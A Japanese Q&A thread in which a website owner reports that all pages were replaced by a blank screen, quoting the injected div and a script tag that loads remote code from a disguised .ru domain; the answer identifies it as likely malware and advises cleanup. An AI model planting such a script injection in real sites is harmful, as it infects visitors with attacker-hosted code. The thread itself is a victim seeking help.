公開していたWEBサイトの全ページがいきなり

「orkut-co-in.walmart.com.r」のみ表示される真っ白な画面になってしまいまいた。
ソースコードを開くと
<div id=megaid>orkut-co-in.walmart.com.r</div><script src=http://orkut-co-in.walmart.com.realitykings-com.counterbest.ru:8080/pixnet.net/pixnet.net/google.com/tinyurl.com/auto.ru/></script>
と記述されていました。
これはウイルスか何かでしょうか?orkutを調べたらGoogleの運営するSNSであることが分かりましたが、何か関係があるのでしょうか?
サーバー会社に聞いても「分からない」の一点張りで問題解決できないので何か知っている情報がありましたら教えてください。

回答の条件
  • 1人2回まで
  • 登録:
  • 終了:2010/01/28 14:51:02
※ 有料アンケート・ポイント付き質問機能は2023年2月28日に終了しました。

ベストアンサー

id:horonict No.1

回答回数257ベストアンサー獲得回数51

ポイント60pt

コンピュータ・ウイルスの可能性が高いですね。

他に感染者を増やす危険性が高いので、至急ホームページを閉鎖してください。

また、はてな事務局に頼んでこの質問自体を取り消してください(ハイパーリンクしているので感染する恐れがあります)。

感染経路が分からないので、ホームページを更新しているパソコンのウイルスチェックも行ってください。

問題なのは、"orkut" ではなく、"counterbest.ru" というドメイン経由で別のサイトからスクリプトを実行させようとしていることです。

"walmart.com" に偽装しようとしているあたり、悪意をもったスクリプトであることは確かです。

id:soyuz11

ありがとうございました。至急質問を閉鎖いたします。

2010/01/28 14:50:35

コメントはまだありません

この質問への反応(ブックマークコメント)

トラックバック

「あの人に答えてほしい」「この質問はあの人が答えられそう」というときに、回答リクエストを送ってみてましょう。

これ以上回答リクエストを送信することはできません。制限について

回答リクエストを送信したユーザーはいません